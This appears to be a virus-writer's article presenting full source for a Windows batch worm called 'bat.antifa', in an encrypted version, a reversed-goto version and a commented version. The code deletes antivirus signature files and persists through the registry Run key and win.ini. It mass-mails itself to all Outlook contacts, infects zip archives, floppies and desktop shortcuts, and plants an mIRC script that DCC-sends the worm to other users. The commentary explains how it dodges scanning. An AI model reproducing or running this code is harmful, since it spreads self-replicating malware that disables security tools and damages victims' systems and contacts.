%?%%-%%ð% %.%:\%ï%%ø%%¿%%.%%ú%%û%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %¬%
:f
%?%%-%%ð% %.%:\%ï%%ø%%¿%%.%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %£%
:e
:next
%:%%-%%]% `=GE
%£%%®%%]%%®% %±%
:d
%.%%®%%Þ%%¸% %õ%\%-%²³\%¬%%-%%¬%%-%%¬%%-% %.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]%
%£%%®%%]%%®% %-%
:c
%.%%®%%Þ%%¸% %0 %õ%\%-%²³\%¬%%-%%¬%%-%%¬%%-%
%£%%®%%]%%®% %?%
:b
%ï%%?% %õ%\%-%²³
%£%%®%%]%%®% %.%
:a
%ø%%±% %-%%ª%%ø%%:%%]% %.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]% %£%%®%%]%%®% %æ%%-%%ª%%]%
%£%%®%%]%%®% %¦%


:235
%:%%-%%]% ©=z
%£%%®%%]%%®% %º%
:23
%:%%-%%]% õ=%winbootdir%
%:%%-%%]% ¸=y
%£%%®%%]%%®% %û%%ú%%ô%
:22
%:%%-%%]% #=DI
%:%%-%%]% ª=x
%£%%®%%]%%®% %û%%ú%
:21
%:%%-%%]% ¼=w
%£%%®%%]%%®% %û%%û%
:20
%:%%-%%]% ½=v
%£%%®%%]%%®% %û%%ý%
:19
%:%%-%%]% ¾=u
%£%%®%%]%%®% %û%%ÿ%
:18
%:%%-%%]% ¿=r
%£%%®%%]%%®% %ý%%í%
:17
%:%%-%%]% Ð=q
%£%%®%%]%%®% %ý%%î%
:16
%:%%-%%]% Þ=p
%£%%®%%]%%®% %ý%%ò%
:15
%:%%-%%]% æ=n
%£%%®%%]%%®% %ý%%ó%
:14
%:%%-%%]% ï=m
%£%%®%%]%%®% %ý%%ô%
:13
%:%%-%%]% ð=l
%:%%-%%]% í=9
%£%%®%%]%%®% %ý%%ù%
:12
%:%%-%%]% ÷=k
%:%%-%%]% î=8
%£%%®%%]%%®% %ý%%ú%
:11
%:%%-%%]% ¡=j
%:%%-%%]% ò=7
%£%%®%%]%%®% %ý%%û%
:10
%:%%-%%]% ø=i
%:%%-%%]% ó=6
%£%%®%%]%%®% %ý%%ý%
:9
%:%%-%%]% ¬=h
%:%%-%%]% ô=5
%£%%®%%]%%®% %ý%%ÿ%
:8
%:%%-%%]% ±=f
%:%%-%%]% ù=4
%£%%®%%]%%®% 9
:7
%:%%-%%]% ?=d
%:%%-%%]% ú=3
%£%%®%%]%%®% 8
:6
%:%%-%%]% .=c
%:%%-%%]% û=2
%£%%®%%]%%®% 7
:5
%:%%-%%]% ¦=b
%:%%-%%]% ý=1
%£%%®%%]%%®% 6
:4
%:%%-%%]% º=a
%:%%-%%]% ÿ=0
%£%%®%%]%%®% 5
:3
%:%%-%%]% ®=o
%£%%®%%]%%®% 4
:2
%:%%-%%]% @=RE
%:%%-%%]% £=g
%£%o%]%o 3
:1
%:%%-%t ]=t
go%]%o 2
:0
%:%et -=e
goto 1
:ani
set :=s
goto 0
:end

=====[end code]================================================================

As the virus is executed from behind, it first jumps to the end, and then
everytime upwards to the next commandline. So lots of goto's and labels are
needed (see unencrypted code for better understanding). The only thing you can
really see from the code above, is that the labels are not encrypted.
Because you can't do this with set-encryption :)

Now here comes the unencrypted code:
(Note: If you decrypt the code above, this won't be the same, cause I added
some things while encrypting the virus, for example the encryption routines
... Yes, it was encrypted by hand :)

=====[begin code]===============================================================
@echo off
ctty nul
goto a
:wwwwwww
:payload
goto end
:vvvvvvv
md %winbootdir%\desktop\²nazis_raus!³
goto wwwwwww
:uuuuuuu
:evil
goto vvvvvvv
:ttttttt
del pif.vbs
goto uuuuuuu
:sssssss
for %%k in (%winbootdir%\desktop\*.pif) do copy c:\pif.pif %%k
goto ttttttt
:rrrrrrr
command /f /c copy c:\bat.antifa.bat a:\
goto sssssss
:qqqqqqq
start pif.vbs
goto rrrrrrr
:ppppppp
echo msc.Save>>pif.vbs
goto qqqqqqq
:ooooooo
echo msc.WindowStyle = 4>>pif.vbs
goto ppppppp
:nnnnnnn
echo msc.TargetPath = wshs.ExpandEnvironmentStrings("c:\bat.antifa.bat")>>pif.vbs
goto ooooooo
:mmmmmmm
echo set msc=wshs.CreateShortcut("C:\pif.lnk")>>pif.vbs
goto nnnnnnn
:lllllll
echo set wshs=Wscript.CreateObject("WScript.Shell")>>pif.vbs
goto mmmmmmm
:kkkkkkk
echo dim wshs, msc>>pif.vbs
goto lllllll
:jjjjjjj
echo.on error resume next>pif.vbs
goto kkkkkkk
:iiiiiii
start %winbootdir%\ooo.vbs
goto jjjjjjj
:hhhhhhh
echo next>>%winbootdir%\ooo.vbs
goto iiiiiii
:ggggggg
echo f = "">>%winbootdir%\ooo.vbs
goto hhhhhhh
:fffffff
echo e.Send>>%winbootdir%\ooo.vbs
goto ggggggg
:eeeeeee
echo e.DeleteAfterSubmit = False>>%winbootdir%\ooo.vbs
goto fffffff
:ddddddd
echo e.Attachments.Add ("c:\bat.antifa.bat")>>%winbootdir%\ooo.vbs
goto eeeeeee
:ccccccc
echo e.Body = "Deutschland von der Karte streichen," & chr(13) & "Polen muss bis Frankreich reichen!">>%winbootdir%\ooo.vbs
goto ddddddd
:bbbbbbb
echo e.Subject = "this is where it gets NASTY">>%winbootdir%\ooo.vbs
goto ccccccc
:aaaaaaa
echo next>>%winbootdir%\ooo.vbs
goto bbbbbbb
:zzzzzz
echo x = x + 1>>%winbootdir%\ooo.vbs
goto aaaaaaa
:yyyyyy
echo e.Recipients.Add f>>%winbootdir%\ooo.vbs
goto zzzzzz
:xxxxxx
echo f = d.AddressEntries(x)>>%winbootdir%\ooo.vbs
goto yyyyyy
:wwwwww
echo for o = 1 To d.AddressEntries.Count>>%winbootdir%\ooo.vbs
goto xxxxxx
:vvvvvv
echo set e = b.CreateItem(0)>>%winbootdir%\ooo.vbs
goto wwwwww
:uuuuuu
echo x = 1>>%winbootdir%\ooo.vbs
goto vvvvvv
:tttttt
echo set d = c.AddressLists(y)>>%winbootdir%\ooo.vbs
goto uuuuuu
:ssssss
echo for y = 1 To c.AddressLists.Count>>%winbootdir%\ooo.vbs
goto tttttt
:rrrrrr
echo set c = b.GetNameSpace("MAPI")>>%winbootdir%\ooo.vbs
goto ssssss
:qqqqqq
echo set b = CreateObject("Outlook.Application")>>%winbootdir%\ooo.vbs
goto rrrrrr
:pppppp
echo set a = Wscript.CreateObject("Wscript.Shell")>>%winbootdir%\ooo.vbs
goto qqqqqq
:oooooo
echo dim a,b,c,d,e>>%winbootdir%\ooo.vbs
goto pppppp
:nnnnnn
echo.on error resume next>%winbootdir%\ooo.vbs
goto oooooo
:mmmmmm
del %winbootdir%\ooo.vbs
goto nnnnnn
:llllll
for %%i in (*.zip ..\*.zip %winbootdir%\desktop\*.zip) do powerarc -a -c4 %%i c:\bat.antifa.bat
goto mmmmmm
:kkkkkk
for %%i in (*.zip ..\*.zip %winbootdir%\desktop\*.zip) do pkzip -e0 -u -r -k %%i "c:\bat.antifa.bat">nul.zip
goto llllll
:jjjjjj
del lord
goto kkkkkk
:iiiiii
move lord c:\progra~1\mirc32\script.ini
goto jjjjjj
:hhhhhh
move lord c:\progra~1\mirc\script.ini
goto iiiiii
:gggggg
move lord c:\mirc32\script.ini
goto hhhhhh
:ffffff
move lord c:\mirc\script.ini
goto gggggg
:eeeeee
del c:\payload.reg
goto ffffff
:dddddd
del yup
goto eeeeee
:cccccc
debug<yup
goto dddddd
:bbbbbb
:: cut :)
goto cccccc
:aaaaaa
echo q>>yup
goto bbbbbb
:zzzzz
echo w>>yup
goto aaaaaa
:yyyyy
echo n lord>>yup
goto zzzzz
:xxxxx
echo 04FB>>yup
goto yyyyy
:wwwww
echo rcx>>yup
goto xxxxx
:vvvvv
echo e 05F0 73 6F 63 6B 5F 6E 61 6D 65 20 7D F3>>yup
goto wwwww
:uuuuu
echo e 05E0 65 20 7B 20 2E 73 6F 63 6B 63 6C 6F 73 65 20 25>>yup
goto vvvvv
:ttttt
echo e 05D0 0A 0D 0A 20 20 20 61 6C 69 61 73 20 63 6C 6F 7A>>yup
goto uuuuu
:sssss
echo e 05C0 20 34 30 30 30 0D 0A 20 20 20 7D 20 7D 20 7D 0D>>yup
goto ttttt
:rrrrr
echo e 05B0 0D 0A 20 20 20 20 20 25 6C 20 3D 20 25 6C 20 2B>>yup
goto sssss
:qqqqq
echo e 05A0 6E 74 5F 6E 61 6D 65 20 34 30 30 30 20 26 6C 65>>yup
goto rrrrr
:ppppp
echo e 0590 63 6B 77 72 69 74 65 20 2D 62 20 25 63 6C 69 65>>yup
goto qqqqq
:ooooo
echo e 0580 30 30 20 26 6C 65 0D 0A 20 20 20 20 20 2E 73 6F>>yup
goto ppppp
:nnnnn
echo e 0570 65 61 64 20 25 66 69 6C 65 65 20 25 6C 20 34 30>>yup
goto ooooo
:mmmmm
echo e 0560 3D 20 31 29 20 7B 0D 0A 20 20 20 20 20 2E 62 72>>yup
goto nnnnn
:lllll
echo e 0550 20 20 20 20 20 2E 69 66 20 28 25 65 6E 64 20 21>>yup
goto mmmmm
:kkkkk
echo e 0540 0A 20 20 20 20 7D 20 2E 65 6C 73 65 20 7B 0D 0A>>yup
goto lllll
:jjjjj
echo e 0530 61 6D 65 0D 0A 20 20 20 20 20 2E 68 61 6C 74 0D>>yup
goto kkkkk
:iiiii
echo e 0520 6B 63 6C 6F 73 65 20 25 63 6C 69 65 6E 74 5F 6E>>yup
goto jjjjj
:hhhhh
echo e 0510 65 6E 64 20 31 0D 0A 20 20 20 20 20 2E 73 6F 63>>yup
goto iiiii
:ggggg
echo e 0500 29 20 7B 0D 0A 20 20 20 20 20 2E 73 65 74 20 25>>yup
goto hhhhh
:fffff
echo e 04F0 69 6C 65 28 25 66 69 6C 65 65 29 2E 73 69 7A 65>>yup
goto ggggg
:eeeee
echo e 04E0 20 20 20 2E 69 66 20 28 25 6C 20 3E 3D 20 24 66>>yup
goto fffff
:ddddd
echo e 04D0 63 6C 69 65 6E 74 5F 6E 61 6D 65 3A 20 7B 0D 0A>>yup
goto eeeee
:ccccc
echo e 04C0 20 6F 6E 20 31 3A 73 6F 63 6B 72 65 61 64 3A 25>>yup
goto ddddd
:bbbbb
echo e 04B0 6E 64 20 30 0D 0A 20 20 20 7D 0D 0A 0D 0A 20 20>>yup
goto ccccc
:aaaaa
echo e 04A0 34 30 30 30 0D 0A 20 20 20 2E 73 65 74 20 25 65>>yup
goto bbbbb
:zzzz
echo e 0490 65 0D 0A 20 20 20 25 6C 20 3D 20 25 6C 20 2B 20>>yup
goto aaaaa
:yyyy
echo e 0480 65 6E 74 5F 6E 61 6D 65 20 34 30 30 30 20 26 6C>>yup
goto zzzz
:xxxx
echo e 0470 6F 63 6B 77 72 69 74 65 20 2D 62 20 25 63 6C 69>>yup
goto yyyy
:wwww
echo e 0460 20 34 30 30 30 20 26 6C 65 0D 0A 20 20 20 2E 73>>yup
goto xxxx
:vvvv
echo e 0450 2E 62 72 65 61 64 20 25 66 69 6C 65 65 20 25 6C>>yup
goto wwww
:uuuu
echo e 0440 20 20 2E 73 65 74 20 25 6C 20 30 0D 0A 20 20 20>>yup
goto vvvv
:tttt
echo e 0430 73 65 20 25 73 6F 63 6B 5F 6E 61 6D 65 0D 0A 20>>yup
goto uuuu
:ssss
echo e 0420 61 6D 65 0D 0A 20 20 20 2E 73 6F 63 6B 63 6C 6F>>yup
goto tttt
:rrrr
echo e 0410 61 63 63 65 70 74 20 25 63 6C 69 65 6E 74 5F 6E>>yup
goto ssss
:qqqq
echo e 0400 39 39 39 39 39 29 0D 0A 20 20 20 2E 73 6F 63 6B>>yup
goto rrrr
:pppp
echo e 03F0 5F 6E 61 6D 65 20 24 72 61 6E 64 28 31 2C 39 39>>yup
goto qqqq
:oooo
echo e 03E0 0A 20 20 20 2E 73 65 74 20 25 63 6C 69 65 6E 74>>yup
goto pppp
:nnnn
echo e 03D0 6E 3A 25 73 6F 63 6B 5F 6E 61 6D 65 3A 20 7B 0D>>yup
goto oooo
:mmmm
echo e 03C0 20 20 6F 6E 20 31 3A 73 6F 63 6B 6C 69 73 74 65>>yup
goto nnnn
:llll
echo e 03B0 20 20 20 20 7D 0D 0A 20 20 20 7D 0D 0A 0D 0A 20>>yup
goto mmmm
:kkkk
echo e 03A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>yup
goto llll
:jjjj
echo e 0390 29 20 30 20 31 30 20 2E 63 6C 6F 7A 65 0D 0A 20>>yup
goto kkkk
:iiii
echo e 0380 24 2B 20 24 72 61 6E 64 28 31 2C 39 39 39 39 39>>yup
goto jjjj
:hhhh
echo e 0370 66 66 0D 0A 20 20 20 20 20 2E 74 69 6D 65 72 20>>yup
goto iiii
:gggg
echo e 0360 0D 0A 20 20 20 20 20 2E 74 69 6D 65 72 73 20 6F>>yup
goto hhhh
:ffff
echo e 0350 25 73 6F 63 6B 5F 6E 61 6D 65 20 25 70 6F 72 74>>yup
goto gggg
:eeee
echo e 0340 20 20 20 20 2E 73 6F 63 6B 6C 69 73 74 65 6E 20>>yup
goto ffff
:dddd
echo e 0330 65 65 29 2E 73 69 7A 65 20 24 2B 20 01 0D 0A 20>>yup
goto eeee
:cccc
echo e 0320 25 70 6F 72 74 20 24 66 69 6C 65 28 25 66 69 6C>>yup
goto dddd
:bbbb
echo e 0310 65 20 24 6C 6F 6E 67 69 70 28 24 69 70 29 20 20>>yup
goto cccc
:aaaa
echo e 0300 20 01 44 43 43 20 53 45 4E 44 20 25 66 69 6C 65>>yup
goto bbbb
:zzz
echo e 02F0 39 29 0D 0A 20 20 20 20 20 2E 6D 73 67 20 24 31>>yup
goto aaaa
:yyy
echo e 02E0 61 6D 65 20 24 72 61 6E 64 28 31 2C 39 39 39 39>>yup
goto zzz
:xxx
echo e 02D0 20 20 20 20 2E 73 65 74 20 25 73 6F 63 6B 5F 6E>>yup
goto yyy
:www
echo e 02C0 28 20 24 2B 20 24 69 70 20 24 2B 20 29 0D 0A 20>>yup
goto xxx
:vvv
echo e 02B0 53 65 6E 64 20 74 65 6C 65 74 75 62 69 65 73 20>>yup
goto www
:uuu
echo e 02A0 2E 6E 6F 74 69 63 65 20 24 31 20 3A 44 43 43 20>>yup
goto vvv
:ttt
echo e 0290 73 6F 70 20 24 32 29 20 7B 0D 0A 20 20 20 20 20>>yup
goto uuu
:sss
echo e 0280 0A 0D 0A 20 20 20 2E 69 66 20 28 24 31 20 21 69>>yup
goto ttt
:rrr
echo e 0270 28 39 39 39 39 2C 39 39 39 39 39 39 29 20 7D 0D>>yup
goto sss
:qqq
echo e 0260 2E 73 65 74 20 25 70 6F 72 74 20 24 72 61 6E 64>>yup
goto rrr
:ppp
echo e 0250 74 29 20 3D 3D 20 24 66 61 6C 73 65 29 20 7B 20>>yup
goto qqq
:ooo
echo e 0240 20 28 24 70 6F 72 74 66 72 65 65 28 25 70 6F 72>>yup
goto ppp
:nnn
echo e 0230 39 39 39 39 29 0D 0A 20 20 20 2E 77 68 69 6C 65>>yup
goto ooo
:mmm
echo e 0220 72 74 20 24 72 61 6E 64 28 39 39 39 39 2C 39 39>>yup
goto nnn
:lll
echo e 0210 6D 20 7B 0D 0A 20 20 20 2E 73 65 74 20 25 70 6F>>yup
goto mmm
:kkk
echo e 0200 20 20 61 6C 69 61 73 20 63 68 65 63 6B 5F 68 69>>yup
goto lll
:jjj
echo e 01F0 20 20 20 7D 0D 0A 20 20 20 20 7D 0D 0A 0D 0A 20>>yup
goto kkk
:iii
echo e 01E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>yup
goto jjj
:hhh
echo e 01D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>yup
goto iii
:ggg
echo e 01C0 20 24 63 68 61 6E 20 29 0D 0A 20 20 20 20 20 20>>yup
goto hhh
:fff
echo e 01B0 65 63 6B 5F 68 69 6D 28 20 24 6E 69 63 6B 20 2C>>yup
goto ggg
:eee
echo e 01A0 31 30 30 30 30 30 29 20 31 20 35 20 2E 24 63 68>>yup
goto fff
:ddd
echo e 0190 69 6D 65 72 20 24 2B 20 24 72 61 6E 64 28 31 2C>>yup
goto eee
:ccc
echo e 0180 64 20 24 6E 69 63 6B 0D 0A 20 20 20 20 20 2E 74>>yup
goto ddd
:bbb
echo e 0170 7B 0D 0A 20 20 20 20 20 2E 73 65 74 20 25 6F 6C>>yup
goto ccc
:aaa
echo e 0160 20 25 6F 6C 64 20 21 3D 20 24 6E 69 63 6B 29 20>>yup
goto bbb
:zz
echo e 0150 28 24 6E 69 63 6B 20 21 3D 20 24 6D 65 20 26 26>>yup
goto aaa
:yy
echo e 0140 3A 20 7B 0D 0A 0D 0A 20 20 20 20 20 2E 69 66 20>>yup
goto zz
:xx
echo e 0130 0A 20 20 20 20 6F 6E 20 31 3A 6A 6F 69 6E 3A 23>>yup
goto yy
:ww
echo e 0120 2E 61 6E 74 69 66 61 2E 62 61 74 20 7D 0D 0A 0D>>yup
goto xx
:vv
echo e 0110 65 74 20 25 66 69 6C 65 65 20 63 3A 5C 62 61 74>>yup
goto ww
:uu
echo e 0100 6F 6E 20 31 3A 73 74 61 72 74 3A 20 7B 20 2E 73>yup
goto vv
:tt
:: Lord Yup allowed me to use the following ... thanks a lot
goto uu
:ss
regedit /s c:\payload.reg
goto tt
:rr
echo "RegisteredOrganization"="[rRlf]">>c:\payload.reg
goto ss
:qq
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]>>c:\payload.reg
goto rr
:pp
echo "RegisteredOwner"="bat.antifa by philet0ast3r">>c:\payload.reg
goto qq
:oo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]>>c:\payload.reg
goto pp
:nn
echo REGEDIT4>c:\payload.reg
goto oo
:mm
del c:\aaa.reg
goto nn
:ll
echo :hm>>%winbootdir%\lalelu.bat
goto mm
:kk
echo start c:\bat.antifa.bat>>%winbootdir%\lalelu.bat
goto ll
:jj
echo if not exist c:\bat.antifa.bat copy %winbootdir%\e²³\hehehe c:\bat.antifa.bat>>%winbootdir%\lalelu.bat
goto kk
:ii
echo ctty nul>>%winbootdir%\lalelu.bat
goto jj
:hh
echo @echo off>%winbootdir%\lalelu.bat
goto ii
:gg
del %winbootdir%\lalelu.bat
goto hh
:ff
del ptr
goto gg
:ee
move %winbootdir%\system\win.ini %winbootdir%\win.ini
goto ff
:dd
del %winbootdir%\win.ini
goto ee
:cc
copy ptr + %winbootdir%\win.ini %winbootdir%\system\win.ini
goto dd
:bb
echo.>>ptr
goto cc
:aa
echo NullPort=None>>ptr
goto bb
:z
echo run=>>ptr
goto aa
:y
echo load=%winbootdir%\lalelu.bat>>ptr
goto z
:x
echo [windows]>ptr
goto y
:w
regedit /s c:\aaa.reg
goto x
:v
echo "bat.antifa"="c:\\antifa.vbs">>c:\aaa.reg
goto w
:u
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>c:\aaa.reg
goto v
:t
echo REGEDIT4>c:\aaa.reg
goto u
:s
echo MsgBox "Faschismus ist keine Meinung sondern ein Verbrechen!" & Chr(13) & Chr(10) & "Und darauf steht: Die Todesstrafe.",4096,"bat.antifa by philet0ast3r [rRlf]">>c:\antifa.vbs
goto t
:r
echo.on error resume next>c:\antifa.vbs
goto s
:q
del c:\antifa.vbs
goto r
:p
del c:\programme\avpersonal\antivir.vdf
goto q
:o
del c:\tbav\tbav.dat
goto p
:n
del c:\programme\tbav\tbav.dat
goto o
:m
del c:\tbavw95\tbscan.sig
goto n
:l
del c:\programme\mcafee\scan.dat
goto m
:k
del c:\programme\f-prot95\fpwm32.dll
goto l
:j
del c:\programme\norton~1\s32integ.dll
goto k
:i
del c:\progra~1\mirc32\script.ini
goto j
:h
del c:\progra~1\mirc\script.ini
goto i
:g
del c:\mirc32\script.ini
goto h
:f
del c:\mirc\script.ini
goto g
:e
:next
goto f
:d
copy %winbootdir%\e²³\hehehe c:\bat.antifa.bat
goto e
:c
copy %0 %winbootdir%\e²³\hehehe
goto d
:b
md %winbootdir%\e²³
goto c
:a
if exist c:\bat.antifa.bat goto next
goto b
:end

=====[end code]================================================================

The code above is a bit hard to comment, so it's not commented :)
But the following code is (rarely ;). This time in "normal" direction, without
all the goto's and labels. Comments always refer to the code above.

=====[begin code]===============================================================
@echo off
ctty nul
if exist c:\bat.antifa.bat goto next
md %winbootdir%\e²³
copy %0 %winbootdir%\e²³\hehehe
copy %winbootdir%\e²³\hehehe c:\bat.antifa.bat

:: the virus is copied to a directory, most windows-avs can't access

:next
del c:\mirc\script.ini
del c:\mirc32\script.ini
del c:\progra~1\mirc\script.ini
del c:\progra~1\mirc32\script.ini
del c:\programme\norton~1\s32integ.dll
del c:\programme\f-prot95\fpwm32.dll
del c:\programme\mcafee\scan.dat
del c:\tbavw95\tbscan.sig
del c:\programme\tbav\tbav.dat
del c:\tbav\tbav.dat
del c:\programme\avpersonal\antivir.vdf
del c:\antifa.vbs
echo.on error resume next>c:\antifa.vbs
echo MsgBox "Faschismus ist keine Meinung sondern ein Verbrechen!" & Chr(13) & Chr(10) & "Und darauf steht: Die Todesstrafe.",4096,"bat.antifa">>c:\antifa.vbs
echo REGEDIT4>c:\aaa.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>c:\aaa.reg
echo "bat.antifa"="c:\\antifa.vbs">>c:\aaa.reg
regedit /s c:\aaa.reg

:: to give this thing some meaning

echo [windows]>ptr
echo load=%winbootdir%\lalelu.bat>>ptr
echo run=>>ptr
echo NullPort=None>>ptr
echo.>>ptr
copy ptr + %winbootdir%\win.ini %winbootdir%\system\win.ini
del %winbootdir%\win.ini
move %winbootdir%\system\win.ini %winbootdir%\win.ini
del ptr
del %winbootdir%\lalelu.bat
echo @echo off>%winbootdir%\lalelu.bat
echo ctty nul>>%winbootdir%\lalelu.bat
echo if not exist c:\bat.antifa.bat copy %winbootdir%\e²³\hehehe c:\bat.antifa.bat>>%winbootdir%\lalelu.bat
echo start c:\bat.antifa.bat>>%winbootdir%\lalelu.bat
echo :hm>>%winbootdir%\lalelu.bat

:: Not the virus is started at every system-start, but a batch file containing no malicious
:: code, to prevent it from getting scanned. The batch file just checks, if the virus is
:: still present in the root directory. If it's not (meaning it has been removed by hand
:: or av), it gets copied to the root again from the for-windows-unaccessable-directory.
:: And executed.

del c:\aaa.reg
echo REGEDIT4>c:\payload.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]>>c:\payload.reg
echo "RegisteredOwner"="bat.antifa by philet0ast3r">>c:\payload.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]>>c:\payload.reg
echo "RegisteredOrganization"="[rRlf]">>c:\payload.reg
regedit /s c:\payload.reg

:: Lord Yup allowed me to use the following ... thanks a lot
echo e 0100 6F 6E 20 31 3A 73 74 61 72 74 3A 20 7B 20 2E 73>yup
echo e 0110 65 74 20 25 66 69 6C 65 65 20 63 3A 5C 62 61 74>>yup
echo e 0120 2E 61 6E 74 69 66 61 2E 62 61 74 20 7D 0D 0A 0D>>yup
echo e 0130 0A 20 20 20 20 6F 6E 20 31 3A 6A 6F 69 6E 3A 23>>yup
echo e 0140 3A 20 7B 0D 0A 0D 0A 20 20 20 20 20 2E 69 66 20>>yup
echo e 0150 28 24 6E 69 63 6B 20 21 3D 20 24 6D 65 20 26 26>>yup
echo e 0160 20 25 6F 6C 64 20 21 3D 20 24 6E 69 63 6B 29 20>>yup
echo e 0170 7B 0D 0A 20 20 20 20 20 2E 73 65 74 20 25 6F 6C>>yup
echo e 0180 64 20 24 6E 69 63 6B 0D 0A 20 20 20 20 20 2E 74>>yup
echo e 0190 69 6D 65 72 20 24 2B 20 24 72 61 6E 64 28 31 2C>>yup
echo e 01A0 31 30 30 30 30 30 29 20 31 20 35 20 2E 24 63 68>>yup
echo e 01B0 65 63 6B 5F 68 69 6D 28 20 24 6E 69 63 6B 20 2C>>yup
echo e 01C0 20 24 63 68 61 6E 20 29 0D 0A 20 20 20 20 20 20>>yup
echo e 01D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>yup
echo e 01E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>yup
echo e 01F0 20 20 20 7D 0D 0A 20 20 20 20 7D 0D 0A 0D 0A 20>>yup
echo e 0200 20 20 61 6C 69 61 73 20 63 68 65 63 6B 5F 68 69>>yup
echo e 0210 6D 20 7B 0D 0A 20 20 20 2E 73 65 74 20 25 70 6F>>yup
echo e 0220 72 74 20 24 72 61 6E 64 28 39 39 39 39 2C 39 39>>yup
echo e 0230 39 39 39 39 29 0D 0A 20 20 20 2E 77 68 69 6C 65>>yup
echo e 0240 20 28 24 70 6F 72 74 66 72 65 65 28 25 70 6F 72>>yup
echo e 0250 74 29 20 3D 3D 20 24 66 61 6C 73 65 29 20 7B 20>>yup
echo e 0260 2E 73 65 74 20 25 70 6F 72 74 20 24 72 61 6E 64>>yup
echo e 0270 28 39 39 39 39 2C 39 39 39 39 39 39 29 20 7D 0D>>yup
echo e 0280 0A 0D 0A 20 20 20 2E 69 66 20 28 24 31 20 21 69>>yup
echo e 0290 73 6F 70 20 24 32 29 20 7B 0D 0A 20 20 20 20 20>>yup
echo e 02A0 2E 6E 6F 74 69 63 65 20 24 31 20 3A 44 43 43 20>>yup
echo e 02B0 53 65 6E 64 20 74 65 6C 65 74 75 62 69 65 73 20>>yup
echo e 02C0 28 20 24 2B 20 24 69 70 20 24 2B 20 29 0D 0A 20>>yup
echo e 02D0 20 20 20 20 2E 73 65 74 20 25 73 6F 63 6B 5F 6E>>yup
echo e 02E0 61 6D 65 20 24 72 61 6E 64 28 31 2C 39 39 39 39>>yup
echo e 02F0 39 29 0D 0A 20 20 20 20 20 2E 6D 73 67 20 24 31>>yup
echo e 0300 20 01 44 43 43 20 53 45 4E 44 20 25 66 69 6C 65>>yup
echo e 0310 65 20 24 6C 6F 6E 67 69 70 28 24 69 70 29 20 20>>yup
echo e 0320 25 70 6F 72 74 20 24 66 69 6C 65 28 25 66 69 6C>>yup
echo e 0330 65 65 29 2E 73 69 7A 65 20 24 2B 20 01 0D 0A 20>>yup
echo e 0340 20 20 20 20 2E 73 6F 63 6B 6C 69 73 74 65 6E 20>>yup
echo e 0350 25 73 6F 63 6B 5F 6E 61 6D 65 20 25 70 6F 72 74>>yup
echo e 0360 0D 0A 20 20 20 20 20 2E 74 69 6D 65 72 73 20 6F>>yup
echo e 0370 66 66 0D 0A 20 20 20 20 20 2E 74 69 6D 65 72 20>>yup
echo e 0380 24 2B 20 24 72 61 6E 64 28 31 2C 39 39 39 39 39>>yup
echo e 0390 29 20 30 20 31 30 20 2E 63 6C 6F 7A 65 0D 0A 20>>yup
echo e 03A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>yup
echo e 03B0 20 20 20 20 7D 0D 0A 20 20 20 7D 0D 0A 0D 0A 20>>yup
echo e 03C0 20 20 6F 6E 20 31 3A 73 6F 63 6B 6C 69 73 74 65>>yup
echo e 03D0 6E 3A 25 73 6F 63 6B 5F 6E 61 6D 65 3A 20 7B 0D>>yup
echo e 03E0 0A 20 20 20 2E 73 65 74 20 25 63 6C 69 65 6E 74>>yup
echo e 03F0 5F 6E 61 6D 65 20 24 72 61 6E 64 28 31 2C 39 39>>yup
echo e 0400 39 39 39 39 39 29 0D 0A 20 20 20 2E 73 6F 63 6B>>yup
echo e 0410 61 63 63 65 70 74 20 25 63 6C 69 65 6E 74 5F 6E>>yup
echo e 0420 61 6D 65 0D 0A 20 20 20 2E 73 6F 63 6B 63 6C 6F>>yup
echo e 0430 73 65 20 25 73 6F 63 6B 5F 6E 61 6D 65 0D 0A 20>>yup
echo e 0440 20 20 2E 73 65 74 20 25 6C 20 30 0D 0A 20 20 20>>yup
echo e 0450 2E 62 72 65 61 64 20 25 66 69 6C 65 65 20 25 6C>>yup
echo e 0460 20 34 30 30 30 20 26 6C 65 0D 0A 20 20 20 2E 73>>yup
echo e 0470 6F 63 6B 77 72 69 74 65 20 2D 62 20 25 63 6C 69>>yup
echo e 0480 65 6E 74 5F 6E 61 6D 65 20 34 30 30 30 20 26 6C>>yup
echo e 0490 65 0D 0A 20 20 20 25 6C 20 3D 20 25 6C 20 2B 20>>yup
echo e 04A0 34 30 30 30 0D 0A 20 20 20 2E 73 65 74 20 25 65>>yup
echo e 04B0 6E 64 20 30 0D 0A 20 20 20 7D 0D 0A 0D 0A 20 20>>yup
echo e 04C0 20 6F 6E 20 31 3A 73 6F 63 6B 72 65 61 64 3A 25>>yup
echo e 04D0 63 6C 69 65 6E 74 5F 6E 61 6D 65 3A 20 7B 0D 0A>>yup
echo e 04E0 20 20 20 2E 69 66 20 28 25 6C 20 3E 3D 20 24 66>>yup
echo e 04F0 69 6C 65 28 25 66 69 6C 65 65 29 2E 73 69 7A 65>>yup
echo e 0500 29 20 7B 0D 0A 20 20 20 20 20 2E 73 65 74 20 25>>yup
echo e 0510 65 6E 64 20 31 0D 0A 20 20 20 20 20 2E 73 6F 63>>yup
echo e 0520 6B 63 6C 6F 73 65 20 25 63 6C 69 65 6E 74 5F 6E>>yup
echo e 0530 61 6D 65 0D 0A 20 20 20 20 20 2E 68 61 6C 74 0D>>yup
echo e 0540 0A 20 20 20 20 7D 20 2E 65 6C 73 65 20 7B 0D 0A>>yup
